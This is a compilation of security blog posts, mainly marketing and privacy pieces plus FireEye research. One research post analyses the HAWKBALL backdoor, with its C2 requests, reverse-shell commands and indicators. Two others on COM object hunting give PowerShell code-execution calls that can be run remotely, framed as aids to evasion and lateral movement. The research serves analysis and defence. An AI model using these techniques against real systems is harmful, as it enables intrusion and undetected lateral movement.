But this dramatic expansion of the application layer introduces new security challenges. In one engagement, Veracode worked with a High Street bank to secure its web application portfolio and uncovered 1,800 websites that had not been inventoried – making its attack surface 50 percent bigger than originally thought.

With the growing complexity of IT infrastructures and a shortage of qualified security experts, businesses and government agencies alike need to enlist application security specialists with a deep understanding of the complexity of modern applications.

Veracode pioneered static binary analysis to address the security of modern applications, which are often assembled by different teams from multiple languages, frameworks, and third-party libraries. This approach allows security and development teams to assess the security posture of entire applications once they’ve been built, rather than analyzing individual pieces of source code and missing some of the potential “cross-platform” exploits.

Yet the Veracode Platform offers so much more than its signature static binary analysis.

“With a growing number of integrations with CI/CD tools and development environments and expanding its coverage to the full software supply chain, Veracode clearly shows the commitment to fully embrace the modern DevOps and DevSecOps methodologies and to address the latest security and compliance challenges,” writes KuppingerCole Lead Analyst Alexei Balaganski. “With the SaaS approach, the company can ensure that customers can start using the platform within hours, and a wide range of support, consulting and training services means they are ready to guide every customer towards the application security best practices as quickly as possible.”

To learn more about our approach to supporting modern DevOps and DevSecOps methodologies, and how the Veracode Platform is even easier for software developers to use, download the KuppingerCole Report, Executive View: Veracode Application Security Platform.

Fifty States, Fifty Laws

The big news lately is that individual states are proposing their own privacy laws. California has the California Consumer Protection Act and now New York and Maine have also proposed laws. There has been discussion of a federal law, however it seems unlikely that any kind of landmark legislation on privacy passes through to be […]

The post Fifty States, Fifty Laws appeared first on Privacy Ref.

Small and Mid-size Orgs: Take Notice of this Trend in the 2019 Verizon Data Breach Investigations Report (DBIR).

43% of breaches in 2018 involved small businesses. Hackers know you’re vulnerable and they’re acting on it.

We’re big fans of the DBIR over here, not just because we’re contributing partners and want to see our name in lights. Yes, we’re certainly guilty of initially jumping into the contributor section and searching for our logo, but after that, we devour the data. The report in itself is an easy read, and there is also a DBIR executive summary available for those that want a short overview.

At GRA Quantum, we’re experts at developing tailored security solutions for small organizations facing big threats – and the data in this year’s DBIR shows that the threats facing these orgs are only growing. 43% of breaches in 2018 involved small businesses. And that makes sense when you take the threat actors’ POV into account: nefarious attackers know that small and mid-size businesses don’t have the cyber hygiene that’s expected of enterprise organizations. Yet the personally identifiable information (PII) and intellectual property of smaller organizations are just as valuable.

It’s not all bad news.

As more organizations, especially in the small and mid-size range, move to the cloud, hackers shift their focus to the cloud too: the DBIR showed an increase in hackers’ focus on cloud-based servers. Where’s the good news in this? Much of this hacking stems from stolen credentials and can be prevented with better education among staff, paired with anti-phishing technology and managed security services – all affordable options for companies that don’t have hundreds or thousands of endpoints.

More good news: you can start protecting your small org today by implementing some cybersecurity best practices. We’ve developed a checklist to strengthen your cybersecurity program that can get you started. It’s more straightforward than you may anticipate, and you don’t have to be technical or in a security role to kick off the initiative. In fact, the list was created for management in Human Resources and Finance departments. Items in the list that are easiest to implement include:

  • Enforcing a policy to require multi-factor authentication (MFA) to access all company systems
  • Creating an onboarding and offboarding policy, integrating HR and IT activities
  • Developing a third-party vendor risk management program
Start taking this proactive approach to get ahead of the threats and strengthen your security stance today.

 

The post Small and Mid-size Orgs: Take Notice of this Trend in the 2019 Verizon Data Breach Investigations Report (DBIR). appeared first on GRA Quantum.

Privacy Comes at a Price

At Apple’s World Wide Developers Conference last week, the message was all about Privacy. Apple has been more privacy-minded than other tech companies – that’s not news and it’s why I have an iPhone. They’ve introduced some interesting privacy features, such as showing location tracking, which I think is pretty cool. I don’t leave my […]

The post Privacy Comes at a Price appeared first on Privacy Ref.

CCPA is a Shiny Object

The California Consumer Protection Act has gotten a lot of attention recently and rightly so. It is, however, just one of a number of US state privacy legislation initiatives that have either recently been passed or is under consideration. Consider the Maine Act to Protect the Privacy of Online Consumer Information. This law requires that […]

The post CCPA is a Shiny Object appeared first on Privacy Ref.

Hunting COM Objects (Part Two)

Background

As a follow up to Part One in this blog series on COM object hunting, this post will talk about taking the COM object hunting methodology deeper by looking at interesting COM object methods exposed in properties and sub-properties of COM objects.

What is a COM Object?

According to Microsoft, “The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. COM is the foundation technology for Microsoft's OLE (compound documents), ActiveX (Internet-enabled components), as well as others.”

A COM object’s services can be consumed from almost any language by multiple processes, or even remotely. COM objects are usually obtained by specifying a CLSID (an identifying GUID) or ProgID (programmatic identifier). These COM objects are published in the Windows registry and can be extracted easily, as described below.
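
As a quick, hedged illustration, both of the following PowerShell lines produce the same object; the Shell.Application ProgID and its well-known CLSID are used purely as a familiar example:

$byProgId = New-Object -ComObject "Shell.Application"
$byClsid  = [Activator]::CreateInstance([Type]::GetTypeFromCLSID([Guid]"13709620-C279-11CE-A49E-444553540000"))
$byProgId | Get-Member -MemberType Method | Select-Object -First 5   # list a few of the methods the object exposes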

COM Object Enumeration

FireEye performed research into COM objects on Windows 10 and Windows 7, along with COM objects in Microsoft Office. Part One of this blog series described a technique for enumerating all COM objects on the system, instantiating them, and searching for interesting properties and methods. However, this only scratches the surface of what is accessible through these COM objects, as each object may return other objects that cannot be directly created on their own.

The change introduced here recursively searches for COM objects that are exposed only through the member methods and properties of each enumerated COM object. The original methodology looked at interesting methods exposed directly by each object and didn’t recurse into properties that may themselves be COM objects with their own interesting methods. This improvement to the methodology assisted in the discovery of a new COM object that can be used for code execution, and new ways to call publicly known code execution COM object methods.

Recursive COM Object Method Discovery

A common theme among publicly discovered techniques for code execution using COM objects is that they take advantage of a method that is exposed within a child property of the COM object. An example of this is the “MMC20.Application” COM object. To achieve code execution with this COM object, you need to use the “ExecuteShellCommand” method on the View object returned by the “Document.ActiveView” property, as discovered by Matt Nelson in this blog post. In Figure 1 you can see how this method is only discoverable within the object returned by “Document.ActiveView”, and is not directly exposed by the MMC20.Application COM object.


Figure 1: Listing ExecuteShellCommand method in MMC20.Application COM object
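
A minimal PowerShell sketch of the technique, following Matt Nelson’s write-up; cmd.exe and calc.exe are placeholders for an arbitrary command:

$mmc = [Activator]::CreateInstance([Type]::GetTypeFromProgID("MMC20.Application"))
# ExecuteShellCommand(Command, Directory, Parameters, WindowState) lives on the View object returned by Document.ActiveView
$mmc.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c calc.exe", "7")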

Another example of this is the “ShellBrowserWindow” COM object, which was also first written about by Matt Nelson in this blog post. As you can see in Figure 2, the “ShellExecute” method is not directly exposed in the COM object. However, the “Document.Application” property returns an instance of the Shell object, which exposes the ShellExecute method.


Figure 2: Listing ShellExecute method in ShellBrowserWindow COM object

As evidenced by the previous two examples, it is important not only to look at the methods exposed directly by a COM object, but also to recursively look for objects with interesting methods exposed as properties of COM objects. This example also illustrates why simply statically exploring the Type Libraries of the COM objects may not be sufficient: the relevant functions are only accessed after dynamically enumerating objects of the generic type IDispatch. This recursive methodology can enable finding new COM objects to be used for code execution, and different ways to use publicly known COM objects for code execution.
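
The following is a minimal sketch of that recursive idea, not FireEye’s actual tooling: it lists an object’s own methods, then walks each property and, if the property itself returns a COM object, lists that child object’s methods as well. The function name and depth limit are illustrative.

function Get-ComMethodsRecursive {
    param($Object, $Path = "(root)", $Depth = 2)
    if ($Depth -lt 0 -or $null -eq $Object) { return }
    # Methods exposed directly by this object
    $Object | Get-Member -MemberType Method -ErrorAction SilentlyContinue |
        ForEach-Object { "{0}.{1}" -f $Path, $_.Name }
    # Recurse into properties that themselves return COM objects
    $Object | Get-Member -MemberType Property -ErrorAction SilentlyContinue | ForEach-Object {
        try {
            $child = $Object.($_.Name)
            if ($child -is [System.__ComObject]) {
                Get-ComMethodsRecursive -Object $child -Path ("{0}.{1}" -f $Path, $_.Name) -Depth ($Depth - 1)
            }
        } catch { }
    }
}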

An example of how this recursive methodology found a new way to call a publicly known COM object method is the “ShellExecute” method in the “ShellBrowserWindow” COM object that was shown previously in this article. The previously publicly known way of calling this method within the “ShellBrowserWindow” COM object is using the “Document.Application” property. The recursive COM object method discovery also found that you can call the “ShellExecute” method on the object returned by the “Document.Application.Parent” property as seen in Figure 3. This can be useful from an evasion standpoint.


Figure 3: Alternative way to call ShellExecute with ShellBrowserWindow COM object
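
A hedged sketch covering both property paths; ShellBrowserWindow has no ProgID, so it is instantiated from its publicly documented CLSID, and calc.exe again stands in for an arbitrary command:

$sbw = [Activator]::CreateInstance([Type]::GetTypeFromCLSID([Guid]"C08AFD90-F2A1-11D1-8455-00A0C91F3880"))
$sbw.Document.Application.ShellExecute("calc.exe")          # the previously published path
$sbw.Document.Application.Parent.ShellExecute("calc.exe")   # the alternative path surfaced by recursive discovery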

Command Execution

Using this recursive COM object method discovery, FireEye was able to find a COM object with the ProgID “Excel.ChartApplication” that can be used for code execution using the DDEInitiate method. This DDEInitiate method of launching executables was first abused in the “Excel.Application” COM object as seen in this article by Cybereason. There are multiple properties in the “Excel.ChartApplication” COM object that return objects that can be used to execute the DDEInitiate method as seen in Figure 4. Although this DDEInitiate method is also exposed directly by the COM object, it was initially discovered when looking at methods exposed in the other objects accessible from this object.


Figure 4: Different ways to call DDEInitiate with Excel.ChartApplication COM object
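
A hedged local sketch of that call path (Excel must be installed; cmd and calc.exe are placeholders for an arbitrary command). GetTypeFromProgID also accepts a second host-name argument, which is how the remote Office 2013 scenario described below would be exercised:

$chart = [Activator]::CreateInstance([Type]::GetTypeFromProgID("Excel.ChartApplication"))
$chart.DDEInitiate("cmd", "/c calc.exe")   # application/topic pair abused to spawn a process
# Remote variant (hypothetical host name): [Type]::GetTypeFromProgID("Excel.ChartApplication", "target-host")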

This COM object can also be instantiated and used remotely against Office 2013, as seen in Figure 5. On Office 2016, the COM object can only be instantiated locally; attempting to instantiate it remotely returns an error code indicating that the COM object class is not registered for remote instantiation.


Figure 5: Using Excel.ChartApplication remotely against Office 2013

Conclusion

The recursive searching of COM object methods can lead to the discovery of new COM objects that can be used for code execution, and new ways to call publicly known COM object methods. These COM object methods can be used to subvert different detection patterns and can also be used for lateral movement.

What the AMCA Data Breach Teaches Us About Modern Supply Chain Security

The State of Software Security Volume 9 (SOSS Vol. 9) found that the healthcare industry, with its stringent regulations, received relatively high marks in many of the standard AppSec metrics. According to Veracode scan data, healthcare organizations ranked highest of all industries on OWASP pass rate on latest scan, coming in with a rate just over 55 percent. Our flaw persistence analysis shows that the industry is statistically closing found vulnerabilities far faster than any other sector.

However, the recent American Medical Collection Agency data breach has brought attention to the fact that breaches involving subcontractors and business associates, particularly in the healthcare industry, are on the rise. According to 8-Ks that both Quest Diagnostics and Laboratory Corporation of America Holdings (LabCorp) have filed with the Securities and Exchange Commission (SEC), as many as 11.9 million people may have had their personal and payment information stolen by an unauthorized user.

Earlier this year, Moody’s Investor Service ranked hospitals as one of the sectors most vulnerable to cyberattacks. In a press release, Moody's Managing Director Derek Vadala said, “We view cyber risk as event risk that can have material impact on sectors and individual issuers. Data disclosure and business disruption are the two primary types of cyber event risk that we view as having the potential for material impact on issuers' financial profiles and business prospects.”

Ensuring the security of patient data

Healthcare organizations appear to be doing their part to ensure the safety of their patient and customer data. Recently, the Wall Street Journal’s Melanie Evans and Peter Loftus published a story about how hospitals are asking device makers to let them under the hood of their software to look for flaws and vulnerabilities – and opting out of doing business if they’re not granted access. The article cites how, in 2017, NewYork-Presbyterian dropped plans to buy infusion pumps manufactured by Smiths Group PLC after the Department of Homeland Security issued a warning that hackers could take control of pumps (a fix has since been released).

That same year, many hospitals were forced to cancel appointments and surgeries when their operations were disrupted by the WannaCry and NotPetya cyberattacks – so it’s no wonder hospitals began enlisting the help of cybersecurity pros, including penetration testers.

Evans and Loftus spoke with corporate counsel at Boston Scientific who noted that negotiations with hospitals are more complicated and drawn out than ever before as a result of cybersecurity demands.

Where is the gap in the modern healthcare supply chain?

Given the sensitivity of the data involved, it’s reasonable for hospitals and healthcare IT companies to be more inquisitive. But it’s not just the healthcare-related technologies that they need to look into.

SOSS Vol. 9 shows that the financial industry, while boasting the largest population of applications under test and with a reputation of maintaining some of the most mature AppSec programs, is struggling to meet AppSec standards. The industry ranks second to last in major verticals examined for OWASP pass rate on latest scan, and based on flaw persistence analysis, it’s leaving flaws to linger longer than other industries do.

In order for hospitals and healthcare organizations to ensure the security of those they care for, they need to be able to trust that the third-party vendors and service providers that they enlist to take payments and process claims are taking the appropriate precautions when it comes to software security.

Awareness begets progress

In 2017, Veracode conducted research with YouGov to better understand how well business leaders understood the cybersecurity risks they are introducing to their company as a result of digital transformation and participation in the global economy. What we found was that awareness was low – even following the Equifax breach that occurred that year. The research showed that only 28 percent of respondents had heard of the attack.

Since then, we’ve seen a number of CEOs and other executives paying the price after a breach. Veracode CTO, EMEA, Paul Farrington, said it best:

“Ultimately, this is merely an extension of expectations on the C-Suite when responding to serious events. If CEOs violate environmental, health, or safety standards, they can be fined, and even jailed in many countries. Perfect security is not possible, but with data about our entire lives now being stored and processed by businesses, it is essential that employees and customers alike are afforded a certain standard of cybersecurity. When such standards aren’t met, there ought to be accountability at a senior level.”

As healthcare organizations and hospitals are doing an increased level of due diligence before making a purchase or partnering with third parties, we can expect that other industries are likely to follow suit. Executives will begin to add security to their list of priorities, because it will be demanded by the board in an effort to protect their brand and bottom line.

Give your customers confidence that your software is secure

Given that perfect security isn’t possible, organizations should consider reviewing their software development processes to ensure that security is embedded in each stage. One of the reasons that we created Veracode Verified, which helps your organization prove at a glance that you’ve made security a priority, is to help organizations stay ahead of customer and prospect security concerns and speed up sales cycles – without straining limited security resources. The program provides you with a proven roadmap for maturing your application security program, as well as an attestation letter you can share with customers and prospects.

Curious to learn more about how your organization may benefit from Veracode Verified? Have a look at this infographic to get the details.

Australian Cyber Security Centre advises Windows users across Australia to protect against BlueKeep

The ACSC is aware of Microsoft’s recent disclosure of a remote desktop vulnerability called CVE-2019-0708, also known as BlueKeep. As an indication of just how significant the impacts of BlueKeep can be to their customers, Microsoft took the unusual step of publishing advice to warn of its ability to propagate or ‘worm’ through vulnerable computer systems, with no user interaction at all.

Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities

FireEye Labs recently observed an attack against the government sector in Central Asia. The attack involved the new HAWKBALL backdoor being delivered via well-known Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802.

HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.

Figure 1 shows the decoy used in the attack.


Figure 1: Decoy used in attack

The decoy file, doc.rtf (MD5: AC0EAC22CE12EAC9EE15CA03646ED70C), contains an OLE object that uses Equation Editor to drop the embedded shellcode in %TEMP% with the name 8.t. This shellcode is decrypted in memory by EQNEDT32.EXE. Figure 2 shows the decryption mechanism used in EQNEDT32.EXE.


Figure 2: Shellcode decryption routine

The decrypted shellcode is dropped as a Microsoft Word plugin WLL (MD5: D90E45FBF11B5BBDCA945B24D155A4B2) into C:\Users\ADMINI~1\AppData\Roaming\Microsoft\Word\STARTUP (Figure 3).


Figure 3: Payload dropped as Word plugin

Technical Details

DllMain of the dropped payload determines whether the string WORD.EXE is present in the sample’s command line. If the string is not present, the malware exits. If the string is present, the malware executes the command RunDll32.exe C:\Users\ADMINI~1\AppData\Roaming\Microsoft\Word\STARTUP\hh14980443.wll, DllEntry using the WinExec() function.

DllEntry is the payload’s only export function. The malware creates a log file in %TEMP% with the name c3E57B.tmp. The malware writes the current local time plus two hardcoded values every time in the following format:

<Month int>/<Date int> <Hours>:<Minutes>:<Seconds>\t<Hardcoded Digit>\t<Hardcoded Digit>\n

Example:

05/22 07:29:17 4          0

This log file is written to every 15 seconds. The last two digits are hard coded and passed as parameters to the function (Figure 4).


Figure 4: String format for log file

The encrypted file contains a config file of 0x78 bytes. The data is decrypted with a single-byte XOR operation using the key 0xD9. The decrypted data contains command and control (C2) information as well as a mutex string used during malware initialization. Figure 5 shows the decryption routine and decrypted config file.


Figure 5: Config decryption routine
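
A small PowerShell sketch of that single-byte XOR decode; config.bin is a hypothetical dump of the embedded 0x78-byte blob:

$encrypted = [System.IO.File]::ReadAllBytes("config.bin")
$decrypted = $encrypted | ForEach-Object { $_ -bxor 0xD9 }        # every byte XORed with 0xD9
[System.Text.Encoding]::ASCII.GetString([byte[]]$decrypted)       # reveals the C2 address and mutex string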

The IP address from the config file is written to %TEMP%/3E57B.tmp with the current local time. For example:

05/22 07:49:48 149.28.182.78.

Mutex Creation

The malware creates a mutex to prevent multiple instances of execution. Before naming the mutex, the malware determines whether it is running under the system profile (Figure 6): it resolves the environment variable %APPDATA% and checks the result for the string config/systemprofile.


Figure 6: Verify whether malware is running as a system profile

If the malware is running as a system profile, the string d0c from the decrypted config file is used to create the mutex. Otherwise, the string _cu is appended to d0c and the mutex is named d0c_cu (Figure 7).


Figure 7: Mutex creation

After the mutex is created, the malware writes another entry in the logfile in %TEMP% with the values 32 and 0.

Network Communication

HAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP. The C2 server is obtained from the decrypted config file, as shown in Figure 5. The network request is formed with hard-coded values such as User-Agent. The malware also sets the other fields of request headers such as:

  • Content-Length: <content_length>
  • Cache-Control: no-cache
  • Connection: close

The malware sends an HTTP GET request to its C2 IP address using HTTP over port 443. Figure 8 shows the GET request sent over the network.


Figure 8: Network request

The network request is formed with four parameters in the format shown in Figure 9.

Format = "?t=%d&&s=%d&&p=%s&&k=%d"


Figure 9: GET request parameters formation

Table 1 shows the GET request parameters.

  • t – Initially set to 0
  • s – Initially set to 0
  • p – String from decrypted config at 0x68
  • k – The result of GetTickCount()

Table 1: GET request parameters

If the returned response is 200, then the malware sends another GET request (Figure 10) with the following parameters (Figure 11).

Format = "?e=%d&&t=%d&&k=%d"


Figure 10: Second GET request


Figure 11: Second GET request parameters formation

Table 2 shows information about the parameters.

  • e – Initially set to 0
  • t – Initially set to 0
  • k – The result of GetTickCount()

Table 2: Second GET request parameters

If the returned response is 200, the malware examines the Set-Cookie field. This field provides the Command ID. As shown in Figure 10, the field Set-Cookie responds with ID=17.

This Command ID acts as the index into a function table created by the malware. Figure 12 shows the creation of the virtual function table that will perform the backdoor’s command.


Figure 12: Function table

Table 3 shows the commands supported by HAWKBALL.

  • 0 – Set URI query string to value
  • 16 – Unknown
  • 17 – Collect system information
  • 18 – Execute a provided argument using CreateProcess
  • 19 – Execute a provided argument using CreateProcess and upload output
  • 20 – Create a cmd.exe reverse shell, execute a command, and upload output
  • 21 – Shut down reverse shell
  • 22 – Unknown
  • 23 – Shut down reverse shell
  • 48 – Download file
  • 64 – Get drive geometry and free space for logical drives C-Z
  • 65 – Retrieve information about provided directory
  • 66 – Delete file
  • 67 – Move file

Table 3: HAWKBALL commands

Collect System Information

Command ID 17 indexes to a function that collects the system information and sends it to the C2 server. The system information includes:

  • Computer Name
  • User Name
  • IP Address
  • Active Code Page
  • OEM Page
  • OS Version
  • Architecture Details (x32/x64)
  • String at 0x68 offset from decrypted config file

This information is retrieved from the victim using the following WINAPI calls:

Format = "%s;%s;%s;%d;%d;%s;%s %dbit"

  • GetComputerNameA
  • GetUserNameA
  • Gethostbyname and inet_ntoa
  • GetACP
  • GetOEMPC
  • GetCurrentProcess and IsWow64Process


Figure 13: System information

The collected system information is concatenated together, with a semicolon separating each field, using the format string "%s;%s;%s;%d;%d;%s;%s %dbit":

WIN732BIT-L-0;Administrator;10.128.62.115;1252;437;d0c;Windows 7 32bit

This information is encrypted using an XOR operation. The response from the second GET request is used as the encryption key. As shown in Figure 10, the second GET request responds with a 4-byte XOR key. In this case the key is 0xE5044C18.
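
A hedged sketch of that step, assuming the 4-byte key is applied in a repeating pattern and that 0xE5044C18 is laid out little-endian (both are assumptions for illustration):

$info = "WIN732BIT-L-0;Administrator;10.128.62.115;1252;437;d0c;Windows 7 32bit"
$data = [System.Text.Encoding]::ASCII.GetBytes($info)
$key  = 0x18, 0x4C, 0x04, 0xE5                                            # assumed little-endian byte order of 0xE5044C18
$enc  = for ($i = 0; $i -lt $data.Length; $i++) { $data[$i] -bxor $key[$i % 4] }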

Once encrypted, the system information is sent in the body of an HTTP POST. Figure 14 shows data sent over the network with the POST request.


Figure 14: POST request

In the request header, the field Cookie is set with the command ID of the command for which the response is sent. As shown in Figure 14, the Cookie field is set with ID=17, which is the response for the previous command. In the received response, the next command is returned in field Set-Cookie.

Table 4 shows the parameters of this POST request.

  • e – Initially set to 0
  • t – Decimal form of the little-endian XOR key
  • k – The result of GetTickCount()

Table 4: POST request parameters

Create Process

The malware creates a process with specified arguments. Figure 15 shows the operation.


Figure 15: Command create process

Delete File

The malware deletes the file specified as an argument. Figure 16 shows the operation.


Figure 16: Delete file operation

Get Directory Information

The malware gets information for the provided directory address using the following WINAPI calls:

  • FindFirstFileW
  • FindNextFileW
  • FileTimeToLocalFileTime
  • FiletimeToSystemTime

Figure 17 shows the API used for collecting information.


Figure 17: Get directory information

Get Disk Information

This command retrieves the drive information for drives C through Z along with available disk space for each drive.


Figure 18: Retrieve drive information

The information is stored in the following format for each drive:

Format = "%d+%d+%d+%d;"

Example: "8+512+6460870+16751103;"

The information for all the available drives is combined and sent to the server using an operation similar to Figure 14.

Anti-Debugging Tricks

Debugger Detection With PEB

The malware queries the value for the flag BeingDebugged from PEB to check whether the process is being debugged.


Figure 19: Retrieve value from PEB

NtQueryInformationProcess

The malware uses the NtQueryInformationProcess API to detect if it is being debugged. The following flags are used:

  • Passing value 0x7 to ProcessInformationClass:


Figure 20: ProcessDebugPort verification

  • Passing value 0x1E to ProcessInformationClass:


Figure 21: ProcessDebugFlags verification

  • Passing value 0x1F to ProcessInformationClass:


Figure 22: ProcessDebugObject

Conclusion

HAWKBALL is a new backdoor that provides features attackers can use to collect information from a victim and deliver new payloads to the target. At the time of writing, the FireEye Multi-Vector Execution (MVX) engine is able to recognize and block this threat. We advise that all industries remain on alert, though, because the threat actors involved in this campaign may eventually broaden the scope of their current targeting.

Indicators of Compromise (IOC)

  • AC0EAC22CE12EAC9EE15CA03646ED70C (MD5) – Doc.rtf
  • D90E45FBF11B5BBDCA945B24D155A4B2 (MD5) – hh14980443.wll

Network Indicators

  • 149.28.182[.]78:443
  • 149.28.182[.]78:80
  • http://149.28.182[.]78/?t=0&&s=0&&p=wGH^69&&k=<tick_count>
  • http://149.28.182[.]78/?e=0&&t=0&&k=<tick_count>
  • http://149.28.182[.]78/?e=0&&t=<int_xor_key>&&k=<tick_count>
  • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)

FireEye Detections

AC0EAC22CE12EAC9EE15CA03646ED70C

  • Products: FireEye Email Security, FireEye Network Security, FireEye Endpoint Security
  • Signatures: FE_Exploit_RTF_EQGEN_7, Exploit.Generic.MVX
  • Action: Block

D90E45FBF11B5BBDCA945B24D155A4B2

  • Products: FireEye Email Security, FireEye Network Security, FireEye Endpoint Security
  • Signatures: Malware.Binary.Dll, FE_APT_Backdoor_Win32_HawkBall_1, APT.Backdoor.Win.HawkBall
  • Action: Block

Acknowledgement

Thank you to Matt Williams for providing reverse engineering support.

Hunting COM Objects

COM objects have recently been used by penetration testers, Red Teams, and malicious actors to perform lateral movement. COM objects were studied by several other researchers in the past, including Matt Nelson (enigma0x3), who published a blog post on the subject in 2017. Some of these COM objects were also added to the Empire project. To improve the Red Team practice, FireEye performed research into the COM objects available on the Windows 7 and Windows 10 operating systems. Several interesting COM objects were discovered that allow task scheduling, fileless download and execute, and command execution. Although these are not security vulnerabilities on their own, they can be used to defeat detection based on process behavior and heuristic signatures.

What is a COM Object?

According to Microsoft, “The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. COM is the foundation technology for Microsoft's OLE (compound documents), ActiveX (Internet-enabled components), as well as others.”

COM was created in the 1990s as a language-independent binary interoperability standard that enables separate code modules to interact with each other. This can occur within a single process or across processes, and Distributed COM (DCOM) adds serialization, allowing remote procedure calls across the network.

The term “COM object” refers to an executable code section which implements one or more interfaces deriving from IUnknown. IUnknown is an interface with three methods that support object lifetime reference counting and discovery of additional interfaces. Every COM object is identified by a unique binary identifier. These 128-bit (16-byte) globally unique identifiers are generically referred to as GUIDs. When a GUID is used to identify a COM object, it is a CLSID (class identifier), and when it is used to identify an interface it is an IID (interface identifier). Some CLSIDs also have human-readable text equivalents called ProgIDs.
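
As a small illustration of the ProgID-to-CLSID relationship (WScript.Shell is used here purely as a familiar example, not as one of the objects discussed in this research), the mapping can be read from the registry or resolved programmatically:

# Resolve a ProgID to its CLSID via the registry default value.
(Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\WScript.Shell\CLSID").'(default)'

# The same mapping, resolved through the type system.
[type]::GetTypeFromProgID("WScript.Shell").GUID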

Since COM is a binary interoperability standard, COM objects are designed to be implemented and consumed from different languages.  Although they are typically instantiated in the address space of the calling process, there is support for running them out-of-process with inter-process communication proxying the invocation, and even remotely from machine to machine.

The Windows Registry contains a set of keys which enable the system to map a CLSID to the underlying code implementation (in a DLL or EXE) and thus create the object.

Methodology

The registry key HKEY_CLASSES_ROOT\CLSID exposes all the information needed to enumerate COM objects, including the CLSID and ProgID. The CLSID is a globally unique identifier associated with a COM class object. The ProgID is a programmer-friendly string representing an underlying CLSID.

The list of CLSIDs can be obtained using the PowerShell commands shown in Figure 1.

New-PSDrive -PSProvider registry -Root HKEY_CLASSES_ROOT -Name HKCR
Get-ChildItem -Path HKCR:\CLSID -Name | Select -Skip 1 > clsids.txt

Figure 1: Enumerating CLSIDs under HKCR

The output will resemble Figure 2.

{0000002F-0000-0000-C000-000000000046}
{00000300-0000-0000-C000-000000000046}
{00000301-A8F2-4877-BA0A-FD2B6645FB94}
{00000303-0000-0000-C000-000000000046}
{00000304-0000-0000-C000-000000000046}
{00000305-0000-0000-C000-000000000046}
{00000306-0000-0000-C000-000000000046}
{00000308-0000-0000-C000-000000000046}
{00000309-0000-0000-C000-000000000046}
{0000030B-0000-0000-C000-000000000046}
{00000315-0000-0000-C000-000000000046}
{00000316-0000-0000-C000-000000000046}

Figure 2: Abbreviated list of CLSIDs from HKCR

We can use the list of CLSIDs to instantiate each object in turn, and then enumerate the methods and properties exposed by each COM object. PowerShell exposes the Get-Member cmdlet that can be used to list methods and properties on an object easily. Figure 3 shows a PowerShell script to enumerate this information. Where possible in this study, standard user privileges were used to provide insight into available COM objects under the worst-case scenario of having no administrative privileges.

$Position = 1
$Filename = "win10-clsid-members.txt"     # output file for the member listings
$inputFilename = "clsids.txt"             # CLSID list produced in Figure 1
ForEach($CLSID in Get-Content $inputFilename) {
      # Progress indicator on the console; details go to the output file
      Write-Output "$($Position) - $($CLSID)"
      Write-Output "------------------------" | Out-File $Filename -Append
      Write-Output $($CLSID) | Out-File $Filename -Append
      # Instantiate the COM object and dump its methods and properties
      $handle = [activator]::CreateInstance([type]::GetTypeFromCLSID($CLSID))
      $handle | Get-Member | Out-File $Filename -Append
      $Position += 1
}

Figure 3: PowerShell scriptlet used to enumerate available methods and properties

If you run this script, expect some interesting side-effect behavior such as arbitrary applications being launched, system freezes, or script hangs. Most of these issues can be resolved by closing the applications that were launched or by killing the processes that were spawned.

Armed with a list of all the CLSIDs and the methods and properties they expose, we can begin the hunt for interesting COM objects. Most COM servers (the code implementing a COM object) live in a DLL whose path is stored in the registry, under the CLSID's InprocServer32 subkey (see the sketch below). This is useful because undocumented COM objects may require reverse engineering, and the registry entry tells you exactly which binary to analyze.
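
The lookup itself is a one-liner (this uses the HKCR: drive created in Figure 1; the CLSID is one that appears later in this post):

# Find the DLL that implements a given COM class.
$clsid = "{E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E}"
(Get-ItemProperty -Path "HKCR:\CLSID\$clsid\InprocServer32").'(default)'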

On Windows 7, a total of 8,282 COM objects were enumerated. Windows 10 featured 3,250 new COM objects in addition to those present on Windows 7. Non-Microsoft COM objects were generally omitted because they cannot be reliably expected to be present on target machines, which limits their usefulness to Red Team operations. Selected Microsoft COM objects from the Windows SDK were included in the study for purposes of targeting developer machines.

Once the members were obtained, a keyword-based search approach was used to quickly yield results. For the purposes of this research, the following keywords were used: execute, exec, spawn, launch, and run.
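
A quick way to run that search is to grep the member dump produced by the Figure 3 script with Select-String (the file name below is the one assumed in that script):

# Flag any dumped method or property whose name contains one of the keywords.
Select-String -Path .\win10-clsid-members.txt -Pattern 'execute|exec|spawn|launch|run'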

One example was the {F1CA3CE9-57E0-4862-B35F-C55328F05F1C} COM object (WatWeb.WatWebObject) on Windows 7. This COM object exposed a method named LaunchSystemApplication as shown in Figure 4.


Figure 4: WatWeb.WatWebObject methods including the interesting LaunchSystemApplication method

The InprocServer32 entry for this object was set to C:\windows\system32\wat\watweb.dll, which is part of Microsoft’s Windows Genuine Advantage product key validation system. The LaunchSystemApplication method expected three parameters, but this COM object was not well-documented and reverse engineering was required, meaning it was time to dig through some assembly code.

Once C:\windows\system32\wat\watweb.dll is loaded in your favorite tool (in this case, IDA Pro), it’s time to find where this method is defined. Luckily, Microsoft exposed debugging symbols, making the reverse engineering much more efficient. Looking at the disassembly, LaunchSystemApplication calls LaunchSystemApplicationInternal, which, as one might suspect, calls CreateProcess to launch an application. This is shown in the Hex-Rays decompiler pseudocode in Figure 5.


Figure 5: Hex-Rays pseudocode confirming that LaunchSystemApplicationInternal calls CreateProcessW

But does this COM object allow creation of arbitrary processes? The argument passed to CreateProcess is user-controlled and is derived from the arguments passed to the function. However, notice the call to CWgpOobWebObjectBaseT::IsApprovedApplication prior to the CreateProcess call. The Hex-Rays pseudocode for this method is shown in Figure 6.


Figure 6: Hex-Rays pseudocode for the IsApprovedApplication method

